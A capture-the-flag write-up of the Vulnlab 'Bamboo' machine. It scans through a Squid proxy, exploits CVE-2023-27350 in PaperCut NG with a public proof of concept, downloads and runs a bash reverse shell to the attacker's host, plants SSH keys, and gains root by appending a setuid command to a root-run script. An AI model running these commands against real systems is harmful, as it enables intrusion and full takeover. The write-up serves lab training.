Bamboo is a Medium Linux machine from Vulnlab, created by xct. It involves getting foothold by exploiting a CVE in PaperCut NG and escalating privileges by exploiting a 0day.

Enumeration

NMAP

We start, as always, with a standard scan. I’ll use rustscan to get the open ports then nmap to get more details about them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  rustscan --range 1-65535 -b 2000 -a 10.10.66.158
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😡 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.66.158:22
Open 10.10.66.158:3128
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜  sudo nmap -sC -sV -p22,3128 --min-rate=5000 10.10.66.158
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 10:02 EST
Nmap scan report for 10.10.66.158
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83:b2:62:7d:9c:9c:1d:1c:43:8c:e3:e3:6a:49:f0:a7 (ECDSA)
|_ 256 cf:48:f5:f0:a6:c1:f5:cb:f8:65:18:95:43:b4:e7:e4 (ED25519)
3128/tcp open http-proxy Squid http proxy 5.2
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/5.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.67 seconds

From the scan, we see SSH and Squid ports are open.

Squid

With the Squid proxy port open, we may be able to use it to look inside. First, let’s add the IP and port to our proxychains4.conf file like this.

1
2
➜  cat /etc/proxychains4.conf | tail -n1
http 10.10.66.158 3128

There’s an article about pentesting Squid on HackTricks https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid you can check it.
I’ll use a tool called Squidscan created by xct, available here: https://gist.github.com/xct/597d48456214b15108b2817660fdee00. After downloading the files go.mod and squidscan.go, edit the squidscan.go file to adjust the machine IP and port

1
2
3
4
5
6
7
...
var (
proxyURL = "http://10.10.66.158:3128" // adjust proxy ip & port
numWorkers = 100 // adjust workers
numPorts = 65535 // adjust ports
)
...

Then, install the dependencies

1
2
3
4
5
6
7
8
➜  go mod tidy
go: downloading github.com/cheggaaa/pb/v3 v3.1.2
go: downloading github.com/VividCortex/ewma v1.2.0
go: downloading github.com/fatih/color v1.14.1
go: downloading github.com/mattn/go-colorable v0.1.13
go: downloading github.com/mattn/go-isatty v0.0.17
go: downloading github.com/mattn/go-runewidth v0.0.12
go: downloading golang.org/x/sys v0.5.0

Build the tool

1
➜  go build

And we have a squidscan binary that we can run

1
2
3
4
5
6
7
8
9
10
➜  ls
go.mod go.sum squidscan squidscan.go
➜ ./squidscan
430 / 65535 [->__________________________________________________________________________________________________________________________________________________________________________________] 0.66% 698 p/sPort 22 found!
9108 / 65535 [------------------------>_________________________________________________________________________________________________________________________________________________________] 13.90% 540 p/sPort 9173 found!
Port 9174 found!
9239 / 65535 [------------------------->________________________________________________________________________________________________________________________________________________________] 14.10% 548 p/sPort 9195 found!
Port 9192 found!
10104 / 65535 [--------------------------->_____________________________________________________________________________________________________________________________________________________] 15.42% 528 p/sPort 9191 found!
65533 / 65535 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->] 100.00% 1 p/s

It found some ports open inside. We can use nmap with proxychains to scan those specific ports and identify the service for each one.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
➜  proxychains -q nmap -sC -sV -p22,9173,9174,9195,9192,9191 127.0.0.1 --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 10:24 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.15s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83:b2:62:7d:9c:9c:1d:1c:43:8c:e3:e3:6a:49:f0:a7 (ECDSA)
|_ 256 cf:48:f5:f0:a6:c1:f5:cb:f8:65:18:95:43:b4:e7:e4 (ED25519)
9173/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9174/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: organizationName=PaperCut Software International Pty Ltd./stateOrProvinceName=VIC/countryName=AU
| Not valid before: 2023-05-26T13:10:12
|_Not valid after: 2033-05-26T13:10:12
9191/tcp open sun-as-jpda?
| fingerprint-strings:
| ...
9192/tcp open ssl/unknown
| ssl-cert: Subject: commonName=bamboo/organizationName=unknown/stateOrProvinceName=unknown/countryName=unknown
| Not valid before: 2023-05-25T13:09:59
|_Not valid after: 2038-01-18T03:14:07
| fingerprint-strings:
| ...
9195/tcp open ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=bamboo/organizationName=unknown/stateOrProvinceName=unknown/countryName=unknown
| Subject Alternative Name: DNS:bamboo
| Not valid before: 2023-05-25T13:10:17
|_Not valid after: 2030-05-26T13:10:17
| fingerprint-strings:
| ...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.92 seconds

We have PaperCut NG running on port 9191. Let’s configure our burp to use the proxy address. Go to proxy settings -> Network -> Connections -> Upstream Proxy Servers and add the Proxy Host and Proxy port in the respective fields.
Now, accessing http://127.0.0.1:9191 should load the page.

User

The PaperCut NG version is 22.0. Let’s look for vulnerabilities for that version. By searching for related CVEs, we find this PoC for CVE-2023-27350 on GitHub: https://github.com/horizon3ai/CVE-2023-27350
We can run it as follows. I used a simple curl to test if the command actually gets executed or no

1
2
3
4
5
6
7
8
➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'curl http://10.8.0.210'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

And indeed it gets executed and we got a hit on our python server

1
2
3
4
➜  http
inet 10.8.0.210 netmask 255.255.255.0 destination 10.8.0.210
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.66.158 - - [14/Dec/2023 10:43:14] "GET / HTTP/1.1" 200 -

Reverse Shell

I will generate a bash reverse shell using my tool shellcat (you can find it here https://github.com/seriotonctf/shellcat)

1
2
3
➜  shellcat bash 10.8.0.210 443 -w x
[+] Payload: bash -i >& /dev/tcp/10.8.0.210/443 0>&1
[+] Payload written to x

If we try to send the reverse shell like the following we won’t get a shell for some reason

1
2
3
4
5
6
7
8
➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'bash -i >& /dev/tcp/10.8.0.210/443 0>&1'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

The method I found working was to transfer the reverse shell file to the machine using curl

1
2
3
4
5
6
7
8
➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'curl http://10.8.0.210/x -o /tmp/x'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Then we can just execute it with bash

1
2
3
4
5
6
7
8
➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'bash /tmp/x'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

And we got a shell as the papercut user

1
2
3
4
5
6
➜  nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.66.158] 57596
bash: cannot set terminal process group (520): Inappropriate ioctl for device
bash: no job control in this shell
papercut@bamboo:~/server$

Let’s stabilize our shell and get the user flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
papercut@bamboo:~/server$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ ^Z
[1] + 19327 suspended nc -nlvp 443
➜ stty raw -echo;fg

[1] + 19327 continued nc -nlvp 443

papercut@bamboo:~/server$ whoami
papercut
papercut@bamboo:~/server$ cd ~
papercut@bamboo:~$ cat user.txt
VL{REDACTED}

It is better to get an SSH shell, so let’s add our key to the authorized_keys file

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜  ssh-keygen -f papercut
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in papercut
Your public key has been saved in papercut.pub
The key fingerprint is:
SHA256:o+XOCmyqdH/TqTDp5rrp5jK66ZayoT7gWCR5MQE4JnY serioton@eternal
The key's randomart image is:
+---[RSA 3072]----+
|o... |
|+ooE |
|+o.o |
|o o |
| + S |
|. .. .+ . |
|=o..++. o . |
|=X.++oo= o |
|&*O*=+oo= |
+----[SHA256]-----+
➜ cat papercut.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8vSBwo/j04rxieOt6d10b9WEa5DcYY06yxBUlhIOsZDt5wQTrniE9ysK2RwJdQli2J4+knJJRlupwIyxGu9bKEbYmZhBbh3fVTXHrc48bklTeaQVyDW0lB2RWOIShh56KwF3m/Em7cPp8zVYzs/5fL5YKaYOQmwgoweis1/1cNFzvBMLKvrf3FMEqnPf3jgrj8QHBYB98RxFoteB4cGr/hIxOm2c5rQ87Qf0Sfg0dKJdsAVwRvG1tX77w7FmUeQxeCwUM78F5+cAiCBwWZ+r6WLKyzheiI3OaQkOiAxBnfL6e1+WAXyLdoh4tA1yDr8r/kBKgXJ6XJlvrp4Fybz2ZShSaXJD4okzlVBtxCRlD8v2vxKhUS/lSfs25aSea0SXtmH+lG/S5OLFnttx+hg2pltLKuKgHMzwpYggv/3wgvYJS4jwtEAhwdGsrwm6vZOhGwbYRvcx2S7aEJ1D1m0WWn1lqvfaJ3kCQHXkNpOvbvXglpTIGhxaJOE3JCOql6v8= serioton@eternal
1
2
3
4
papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8vSBwo/j04rxieOt6d10b9WEa5DcYY06yxBUlhIOsZDt5wQTrniE9ysK2RwJdQli2J4+knJJRlupwIyxGu9bKEbYmZhBbh3fVTXHrc48bklTeaQVyDW0lB2RWOIShh56KwF3m/Em7cPp8zVYzs/5fL5YKaYOQmwgoweis1/1cNFzvBMLKvrf3FMEqnPf3jgrj8QHBYB98RxFoteB4cGr/hIxOm2c5rQ87Qf0Sfg0dKJdsAVwRvG1tX77w7FmUeQxeCwUM78F5+cAiCBwWZ+r6WLKyzheiI3OaQkOiAxBnfL6e1+WAXyLdoh4tA1yDr8r/kBKgXJ6XJlvrp4Fybz2ZShSaXJD4okzlVBtxCRlD8v2vxKhUS/lSfs25aSea0SXtmH+lG/S5OLFnttx+hg2pltLKuKgHMzwpYggv/3wgvYJS4jwtEAhwdGsrwm6vZOhGwbYRvcx2S7aEJ1D1m0WWn1lqvfaJ3kCQHXkNpOvbvXglpTIGhxaJOE3JCOql6v8= serioton@eternal' > authorized_keys
papercut@bamboo:~/.ssh$
1
2
3
4
5
6
7
8
9
10
11
12
13
➜  chmod 600 papercut
➜ ssh -i papercut papercut@10.10.66.158
The authenticity of host '10.10.66.158 (10.10.66.158)' can't be established.
ED25519 key fingerprint is SHA256:wekk48npWyS2NE8vmnCU9mj9hhAW0AvPCy+R0C4Iz48.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:61: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.66.158' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1025-aws x86_64)

...

papercut@bamboo:~$

PrivEsc

We can start enumerating by transferring linpeas.sh to the machine and executing it

1
2
papercut@bamboo:/tmp$ wget http://10.8.0.210/linpeas.sh
papercut@bamboo:/tmp$ bash linpeas.sh

There are some interesting files inside the user home directory

1
2
3
4
5
6
7
8
9
10
11
12
13
╔══════════╣ Analyzing .service files
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/multi-user.target.wants/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/multi-user.target.wants/systemd-networkd.service could be executing some relative path
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path

Specifically, the linux-x64 folder at /home/papercut/server/bin/linux-x64/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
papercut@bamboo:~/server/bin/linux-x64$ ls -lah
total 13M
drwxr-xr-x 3 papercut papercut 4.0K May 26 2023 .
drwx------ 3 papercut papercut 4.0K Sep 29 2022 ..
-rw-r--r-- 1 papercut papercut 1.5K Sep 29 2022 .common
-rwxr-xr-x 1 papercut papercut 109K Sep 29 2022 app-monitor
-rw-r--r-- 1 papercut papercut 5.4K Sep 29 2022 app-monitor.conf
-rwxr-xr-x 1 papercut papercut 17K Sep 29 2022 app-server
-r-s--x--x 1 root root 11K Sep 29 2022 authpam
-rwxr-xr-x 1 papercut papercut 2.4K Sep 29 2022 authsamba
-rwxr-xr-x 1 papercut papercut 479 Sep 29 2022 create-client-config-file
-rwxr-xr-x 1 papercut papercut 468 Sep 29 2022 create-ssl-keystore
-rwxr-xr-x 1 papercut papercut 763 Sep 29 2022 db-tools
-rwxr-xr-x 1 papercut papercut 501 Sep 29 2022 direct-print-monitor-config-initializer
-rwxr-xr-x 1 papercut papercut 2.3K Sep 29 2022 gather-ldap-settings
drwxr-xr-x 2 papercut papercut 4.0K May 26 2023 lib
-rwxr-xr-x 1 papercut papercut 482K Sep 29 2022 pc-pdl-to-image
-rwxr-xr-x 1 papercut papercut 13M Sep 29 2022 pc-split-scan
-rwxr-xr-x 1 papercut papercut 9.4K Sep 29 2022 pc-udp-redirect
-rwxr-xr-x 1 papercut papercut 7.4K Sep 29 2022 roottasks
-rwxr-xr-x 1 papercut papercut 7.6K Sep 29 2022 sambauserdir
-rwxr-xr-x 1 papercut papercut 493 Sep 29 2022 server-command
-rwxr-xr-x 1 papercut papercut 2.3K Sep 29 2022 setperms
-rwxr-xr-x 1 papercut papercut 286 Sep 29 2022 start-server
-rwxr-xr-x 1 papercut papercut 11K Sep 29 2022 stduserdir
-rwxr-xr-x 1 papercut papercut 279 Sep 29 2022 stop-server
-rwxr-xr-x 1 papercut papercut 480 Sep 29 2022 upgrade-server-configuration

These files are related to the PaperCut NG instance running on port 9191 so let’s forward that port via SSH and enumerate further

1
➜  ssh -i papercut papercut@10.10.66.158 -L 9191:127.0.0.1:9191 -N

Before beginning any enumeration process, we need to find a way to login. There is an authentication bypass script in exploitdb https://www.exploit-db.com/exploits/51391 which is the same CVE as the one we initially utilized.
We run it as follows and it will output what we need to do.

1
2
3
4
5
6
➜  python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

We just have to visit those two URLs, and magically we are in.
At this point I ran pspy64 and started clicking random things on the website to see what scripts get triggered and by which user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
papercut@bamboo:/tmp$ chmod +x pspy64
papercut@bamboo:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


β–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆ β–ˆβ–ˆβ–“
β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆ β–’ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆ β–ˆβ–ˆβ–’
β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–’β–‘ β–“β–ˆβ–ˆβ–„ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–’ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘
β–’β–ˆβ–ˆβ–„β–ˆβ–“β–’ β–’ β–’ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–„β–ˆβ–“β–’ β–’ β–‘ β–β–ˆβ–ˆβ–“β–‘
β–’β–ˆβ–ˆβ–’ β–‘ β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–’β–’β–ˆβ–ˆβ–’ β–‘ β–‘ β–‘ β–ˆβ–ˆβ–’β–“β–‘
β–’β–“β–’β–‘ β–‘ β–‘β–’ β–’β–“β–’ β–’ β–‘β–’β–“β–’β–‘ β–‘ β–‘ β–ˆβ–ˆβ–’β–’β–’
β–‘β–’ β–‘ β–‘ β–‘β–’ β–‘ β–‘β–‘β–’ β–‘ β–“β–ˆβ–ˆ β–‘β–’β–‘
β–‘β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–’ β–’ β–‘β–‘
β–‘ β–‘ β–‘
β–‘ β–‘

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/12/14 16:54:43 CMD: UID=1001 PID=26434 | ./pspy64
2023/12/14 16:54:43 CMD: UID=1001 PID=26423 | sshd: papercut
2023/12/14 16:54:43 CMD: UID=0 PID=26365 | sshd: papercut [priv]
2023/12/14 16:54:43 CMD: UID=0 PID=26364 |
2023/12/14 16:54:43 CMD: UID=1001 PID=9009 | /usr/bin/gpg-agent --supervised
2023/12/14 16:54:43 CMD: UID=0 PID=8988 |
2023/12/14 16:54:43 CMD: UID=0 PID=8652 |
2023/12/14 16:54:43 CMD: UID=1001 PID=4455 | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/12/14 16:54:43 CMD: UID=0 PID=1458 |
2023/12/14 16:54:43 CMD: UID=1001 PID=1442 | -bash
2023/12/14 16:54:43 CMD: UID=1001 PID=1436 | sshd: papercut@pts/1
2023/12/14 16:54:43 CMD: UID=0 PID=1351 |
2023/12/14 16:54:43 CMD: UID=1001 PID=1350 | (sd-pam)
2023/12/14 16:54:43 CMD: UID=1001 PID=1349 | /lib/systemd/systemd --user
2023/12/14 16:54:43 CMD: UID=0 PID=1346 | sshd: papercut [priv]
2023/12/14 16:54:43 CMD: UID=0 PID=1245 |
...

Eventually I saw the below output on the pspy64 when I entered this page http://127.0.0.1:9191/app?service=page/PrintDeploy, clicked on Start Importing Mobility Print printers in the Import Mobility Print queues screen and pressed Refresh servers

1
2
3
4
5
6
7
8
9
10
2023/12/14 17:30:23 CMD: UID=0     PID=1      | /sbin/init
2023/12/14 17:32:27 CMD: UID=0 PID=26667 | v2023-02-14-1341/pc-print-deploy-server -dataDir=/home/papercut/providers/print-deploy/linux-x64//data -pclog.dev
2023/12/14 17:32:27 CMD: UID=0 PID=26669 | cat /proc/1/comm
2023/12/14 17:32:27 CMD: UID=0 PID=26670 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26671 |
2023/12/14 17:32:27 CMD: UID=0 PID=26677 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26676 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26675 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0 PID=26678 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:29 CMD: UID=0 PID=26697 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd

As you can see, there is a bash script called server-command that got executed as root (UID=0). So maybe we can write a reverse shell payload or any other command inside it.
First, let’s confirm if it’s writable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
papercut@bamboo:~/server/bin/linux-x64$ find . -writable
.
./pc-pdl-to-image
./authsamba
./pc-udp-redirect
./start-server
./create-ssl-keystore
./server-command
./app-server
./lib
./lib/libwrapper.so
./lib/wrapper-3.2.3.jar
./gather-ldap-settings
./create-client-config-file
./direct-print-monitor-config-initializer
./db-tools
./upgrade-server-configuration
./app-monitor.conf
./stduserdir
./.common
./pc-split-scan
./setperms
./sambauserdir
./roottasks
./stop-server
./app-monitor

Indeed, we can write inside it. I’ll just add a simple command that will give bash the setuid bit

1
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

As you can see, currently, bash doesn’t have the setuid bit set

1
2
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash

But now after we trigger the script by clicking the Refresh Servers button and check bash again we can see it has the setuid bit set

1
2
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash

We are root on the machine :)

1
2
3
4
5
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)
bash-5.1# cat /root/root.txt
VL{REDACTED}

Alternatively, we can add our own SSH key to the root authorized_keys file and SSH as him

1
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8vSBwo/j04rxieOt6d10b9WEa5DcYY06yxBUlhIOsZDt5wQTrniE9ysK2RwJdQli2J4+knJJRlupwIyxGu9bKEbYmZhBbh3fVTXHrc48bklTeaQVyDW0lB2RWOIShh56KwF3m/Em7cPp8zVYzs/5fL5YKaYOQmwgoweis1/1cNFzvBMLKvrf3FMEqnPf3jgrj8QHBYB98RxFoteB4cGr/hIxOm2c5rQ87Qf0Sfg0dKJdsAVwRvG1tX77w7FmUeQxeCwUM78F5+cAiCBwWZ+r6WLKyzheiI3OaQkOiAxBnfL6e1+WAXyLdoh4tA1yDr8r/kBKgXJ6XJlvrp4Fybz2ZShSaXJD4okzlVBtxCRlD8v2vxKhUS/lSfs25aSea0SXtmH+lG/S5OLFnttx+hg2pltLKuKgHMzwpYggv/3wgvYJS4jwtEAhwdGsrwm6vZOhGwbYRvcx2S7aEJ1D1m0WWn1lqvfaJ3kCQHXkNpOvbvXglpTIGhxaJOE3JCOql6v8= serioton@eternal' >> /root/.ssh/authorized_keys
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
➜  ssh -i root_key root@10.10.66.158
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1025-aws x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Dec 14 18:29:35 UTC 2023

System load: 0.05126953125 Processes: 116
Usage of /: 40.0% of 7.57GB Users logged in: 1
Memory usage: 58% IPv4 address for ens5: 10.10.66.158
Swap usage: 0%


Expanded Security Maintenance for Applications is not enabled.

19 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun May 28 09:16:38 2023 from 10.10.1.254
root@bamboo:~# id
uid=0(root) gid=0(root) groups=0(root)

That concludes the box. I hope you learned something new 🐱🐈